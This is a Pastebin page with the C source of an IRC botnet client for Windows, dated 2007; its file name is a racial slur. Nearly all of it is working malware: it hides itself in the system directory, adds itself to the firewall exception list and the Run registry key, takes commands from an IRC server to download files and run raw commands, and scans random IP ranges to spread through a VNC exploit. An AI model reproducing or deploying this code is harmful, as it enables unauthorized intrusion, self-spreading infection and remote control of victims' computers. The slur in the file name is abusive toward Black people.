FlyFar

niggerbot.c

Dec 23rd, 2023
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.06 KB | Cybersecurity | 0 0
  1. /*
  2.  *      niggerbot.c 2007 Ravo_5002
  3.  *      This code is for educational purposes only...
  4.  */
  5.  
  6.  
  7. #include <stdio.h>
  8. #include <winsock.h>
  9. #include <windows.h>
  10.  
  11. #include "niggerbot.h"
  12. #include "ftpd.h"
  13. #include "vncexploit.h"
  14. #include "download.h"
  15. #include "config.h"
  16.  
  17.  
  18.  
  19.  
  20. volatile char *LOL = "GREETZ TO #BOTTALK ON BLUEHELL... YOURE ALL LAMERS THERE! CALL THIS VIRII W32.BOTTALKSUX";
  21.  
  22.  
  23. /* main code */
  24. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  25.  
  26.     char myfilename[512];
  27.     char sysdir[512];
  28.     GetSystemDirectory(sysdir, sizeof(sysdir));
  29.     GetModuleFileName(GetModuleHandle(NULL), myfilename, sizeof(myfilename));
  30.  
  31.     if(strstr(myfilename, sysdir) == NULL) {
  32.         char tmpfilename[512];
  33.         sprintf(tmpfilename, "%s\\%s", sysdir, BOTNAME);
  34.         CopyFile(myfilename, tmpfilename, FALSE);
  35.         SetFileAttributes(tmpfilename,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);
  36.        
  37.         PROCESS_INFORMATION pinfo;
  38.         STARTUPINFO sinfo;
  39.         memset(&pinfo, 0, sizeof(pinfo));
  40.         memset(&sinfo, 0, sizeof(sinfo));
  41.         sinfo.lpTitle     = "";
  42.         sinfo.cb = sizeof(sinfo);
  43.         sinfo.dwFlags = STARTF_USESHOWWINDOW;
  44.         sinfo.wShowWindow = SW_HIDE;
  45.  
  46.         if (CreateProcess(tmpfilename, NULL, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
  47.             Sleep(200);
  48.             CloseHandle(pinfo.hProcess);
  49.             CloseHandle(pinfo.hThread);
  50.             ExitProcess(EXIT_SUCCESS);
  51.         }
  52.     }
  53.     if(!(strstr(GetCommandLine(), "Ravo5002"))) {
  54.         PROCESS_INFORMATION pinfo;
  55.         STARTUPINFO sinfo;
  56.         memset(&pinfo, 0, sizeof(pinfo));
  57.         memset(&sinfo, 0, sizeof(sinfo));
  58.         sinfo.lpTitle = "";
  59.         sinfo.cb = sizeof(sinfo);
  60.         sinfo.dwFlags = STARTF_USESHOWWINDOW;
  61.         sinfo.wShowWindow = SW_HIDE;
  62.  
  63.         if (CreateProcess(myfilename, "Ravo5002", NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, sysdir, &sinfo, &pinfo)) {
  64.             Sleep(200);
  65.             CloseHandle(pinfo.hProcess);
  66.             CloseHandle(pinfo.hThread);
  67.             ExitProcess(EXIT_SUCCESS);
  68.         }
  69.     }
  70.    
  71.     // bot was in system dir and started with the Ravo5002 commandline option
  72.     if (WaitForSingleObject(CreateMutex(NULL, FALSE, MUTEX), 3000) == WAIT_TIMEOUT) {
  73.         ExitProcess(EXIT_FAILURE);
  74.     }
  75.  
  76.     char *fwkey ="SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List";
  77.     //char fwkey[256];
  78.     //rot13(fwkey, "FLFGRZ\\PheeragPbagebyFrg\\Freivprf\\FunerqNpprff\\Cnenzrgref\\SverjnyyCbyvpl\\FgnaqneqCebsvyr\\NhgubevmrqNccyvpngvbaf\\Yvfg");
  79.     // add bot to firewall
  80.     HKEY hkey;
  81.     char pfad[512];
  82.     sprintf(pfad, "%s:*:Enabled:%s", myfilename, REGNAME);
  83.     RegCreateKeyEx(HKEY_LOCAL_MACHINE, fwkey, 0, 0, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkey, 0);
  84.     RegSetValueEx(hkey, myfilename, 0, REG_SZ, (const unsigned char *)pfad, strlen(pfad));
  85.     RegCloseKey(hkey);
  86.    
  87.     char *runkey = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
  88.     //char runkey[256];
  89.     //rot13(runkey, "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefvba\\Eha");
  90.     // add bot to registry startup
  91.     HKEY key;
  92.     RegCreateKeyEx(HKEY_LOCAL_MACHINE , runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
  93.     RegSetValueEx(key, REGNAME, 0, REG_SZ, (const unsigned char *)myfilename, strlen(myfilename));
  94.     RegCloseKey(key);
  95.  
  96.     WSADATA wsaData;
  97.     if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
  98.         exit(1);
  99.     }
  100.    
  101.     SOCKET ircconn;
  102.     ircconn = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  103.    
  104.     if(ircconn == INVALID_SOCKET) {
  105.         return 0;
  106.     }
  107.     HANDLE threads[THREADS];
  108.     threads[0] = CreateThread(NULL,0, irc, (void *)ircconn, 0, 0);
  109.     threads[1] = CreateThread(NULL,0, ftpd, (void *)ircconn, 0, 0);
  110.     int i;
  111.     for(i = 2; i < THREADS; i++) {
  112.         threads[i] = CreateThread(NULL,0, rangescan, (void *)ircconn, 0, 0);
  113.         sleep(500);
  114.     }
  115.     WaitForMultipleObjects( THREADS, threads, TRUE, INFINITE);
  116.     for(i = 0; i < THREADS; i++) {
  117.         CloseHandle(threads[i]);
  118.     }
  119.     WSACleanup();
  120.     return 0;
  121. }
  122.  
  123. char *randnick(void) {
  124.     // shamelessly ripped from kaiten...
  125.     srand(GetTickCount()+rand());
  126.     char *tmp;
  127.     int len=(rand()%5)+4,i;
  128.     tmp=(char*)malloc(len+1);
  129.     memset(tmp,0,len+1);
  130.     for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
  131.     return tmp;
  132. }
  133.  
  134. void privmsg_irc(SOCKET ircconn, char *params) {
  135.  
  136.  
  137.     char *cmd = strtok(params, " ");
  138.     char *options = strtok(NULL, "\n");
  139.     options = strtok(options, "\n");
  140.    
  141.     char buff[4096];
  142.     if(strstr(cmd, "!quit")) {
  143.         sprintf(buff, "QUIT :Latazz...\n");
  144.         send(ircconn,buff, strlen(buff), 0);
  145.         closesocket(ircconn);
  146.         exit(0);
  147.     }
  148.     else if(strstr(cmd, "!irc")) {
  149.         sprintf(buff, "%s\n", options);
  150.         send(ircconn,buff, strlen(buff), 0);
  151.         return;
  152.     }
  153.     else if(strstr(cmd, "!vnc")) {
  154.         sprintf(buff, "PRIVMSG %s :Manually exploiting %s...\n", CHANNEL, options);
  155.         send(ircconn,buff, strlen(buff), 0);
  156.         vncscan(ircconn, options);
  157.         return;
  158.     }
  159.     else if(strstr(cmd, "!download")) {
  160.         sprintf(buff, "PRIVMSG %s :Downloading %s...\n", CHANNEL, options);
  161.         send(ircconn,buff, strlen(buff), 0);
  162.         download(ircconn, options);
  163.         return;
  164.     }
  165.     else if(strstr(cmd, "!ip")) {
  166.         sprintf(buff, "PRIVMSG %s :My ip is %s...\n", CHANNEL, getlocalip());
  167.         send(ircconn,buff, strlen(buff), 0);
  168.         return;
  169.     }
  170.     else if(strstr(cmd, "!version")) {
  171.         sprintf(buff, "PRIVMSG %s :%s\n", CHANNEL, VERSION);
  172.         send(ircconn,buff, strlen(buff), 0);
  173.         return;
  174.     }
  175.     return;
  176. }
  177.  
  178. unsigned long irc(void *s) {
  179.  
  180.     struct hostent *hp;
  181.     unsigned int addr;
  182.     struct sockaddr_in server;
  183.     SOCKET ircconn = (SOCKET)s;
  184.     char buff[4096];
  185.  
  186.     hp = gethostbyname(SERVER);
  187.  
  188.     server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
  189.     server.sin_family=AF_INET;
  190.     server.sin_port=htons(PORT);
  191.     while(connect(ircconn,(struct sockaddr*)&server,sizeof(server))) {
  192.         //printf("cant connect to ircd, lets wait...\n");
  193.         sleep(2000);
  194.     }
  195.  
  196.     char *nick = randnick();
  197.     char *user = randnick();
  198.     char *ident = randnick();
  199.  
  200.     sprintf(buff, "NICK %s\n", nick);
  201.     send(ircconn,buff,strlen(buff),0);
  202.     sprintf(buff, "USER %s \"%s\" \"localhost\" :%s\n", user, ident, nick);
  203.     send(ircconn,buff,strlen(buff),0); 
  204.     sprintf(buff, "JOIN %s\n", CHANNEL);
  205.     send(ircconn,buff,strlen(buff),0);
  206.    
  207.     while(1) {
  208.         memset(buff,0,sizeof(buff));
  209.         recv(ircconn,buff,sizeof(buff),0);
  210.         ircparse(ircconn, buff);
  211.         //printf("%s\n", buff); // debug
  212.         //Sleep(2000);
  213.     }
  214.     return 0;
  215.  
  216. }
  217.  
  218.  
  219. void ircparse(SOCKET ircconn, char ircline[4096]) {
  220.    
  221.     char *first = strtok(ircline, " ");
  222.     char *last = strtok(NULL, "\0");
  223.     if (!first || !last)
  224.         return;
  225.    
  226.    
  227.     // normal irc functions here
  228.     if(strstr(first, "PING")) {
  229.         sprintf(ircline, "PONG %s\n", last);
  230.         send(ircconn,ircline,strlen(ircline),0);
  231.         return;
  232.     }
  233.    
  234.     // botmaster functions here
  235.     char *command = strtok(last, " ");
  236.     strtok(NULL, ":");
  237.     char *parameters = strtok(NULL, "\0");
  238.    
  239.     if(strstr(first, BOTMASTER)) {
  240.         if(strstr(command, "PRIVMSG") || strstr(command, "NOTICE")) {
  241.             privmsg_irc(ircconn, parameters);
  242.             return;
  243.         }
  244.         return;
  245.     }
  246.    
  247.     // error irc functions here
  248.     else if(strstr(command, "433")) {
  249.         sprintf(ircline, "NICK %s\n", randnick());
  250.         send(ircconn,ircline,strlen(ircline),0);
  251.         sprintf(ircline, "JOIN %s\n", CHANNEL);
  252.         send(ircconn,ircline,strlen(ircline),0);
  253.         return;
  254.     }
  255.     else if(strstr(command, "451")) {
  256.         char *nick = randnick();
  257.         char *user = randnick();
  258.         char *ident = randnick();
  259.         sprintf(ircline, "NICK %s\n",  nick);
  260.         send(ircconn,ircline,strlen(ircline),0);
  261.         sprintf(ircline, "USER %s \"%s\" \"localhost\" :%s\n", user, ident, nick);
  262.         send(ircconn,ircline,strlen(ircline),0);   
  263.         sprintf(ircline, "JOIN %s\n", CHANNEL);
  264.         send(ircconn,ircline,strlen(ircline),0);
  265.     }
  266.    
  267.     return;
  268. }
  269.  
  270. unsigned long rangescan(void *s) {
  271.  
  272.     SOCKET ircconn = (SOCKET)s;
  273.    
  274.     // get first two octets of local ip adress.
  275.     char myhostname[80];
  276.     int a, b, c, d;
  277.     gethostname(myhostname, sizeof(myhostname));
  278.     struct hostent *phe = gethostbyname(myhostname);
  279.     struct in_addr addr;
  280.     memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
  281.     char *localip = inet_ntoa(addr);
  282.  
  283.     a = atoi(strtok(localip, "."));
  284.     b = atoi(strtok(NULL, "."));
  285.    
  286.  
  287.    
  288.     if(
  289.         (a == 192 && b == 168) ||               // 192.168
  290.         a == 10 ||                              // 10.
  291.         (a == 172 && (b > 16 && b < 31)) ||     //172.16-172.31
  292.         (a > 40 && a < 50) ||                   // 40.-50. (gov ranges and network 44)
  293.         (a == 169) ||                           // 169. (error adress)
  294.         a < 4                                   // gov adresses
  295.        ) {
  296.         int rangesize = rand()%4;               // 4 is the amount of ranges :)
  297.         char *ranges[] = {                      // ranges to scan when internal... these ranges wont be exploited, but only shown in channel
  298.             "220", "116",
  299.             "200", "161",
  300.             "200", "162",
  301.             "200", "0"
  302.         };
  303.         a = atoi(ranges[rangesize*2]);
  304.         b = atoi(ranges[rangesize*2+1]);
  305.     }
  306.     srand(GetTickCount());
  307.     char ip[32];
  308.     while(1) {
  309.         c = rand()%253+1;
  310.         d = rand()%253+1;
  311.         sprintf(ip, "%d.%d.%d.%d", a, b, c, d);
  312.         vncscan(ircconn, ip);
  313.     }
  314.     return 0;
  315. }
  316.  
  317.  
  318. char *getlocalip(void) {
  319.     char myhostname[80];
  320.     gethostname(myhostname, sizeof(myhostname));
  321.     struct hostent *phe = gethostbyname(myhostname);
  322.     struct in_addr addr;
  323.     memcpy(&addr, phe->h_addr_list[0], sizeof(struct in_addr));
  324.     return inet_ntoa(addr);
  325. }
Add Comment
Please, Sign In to add comment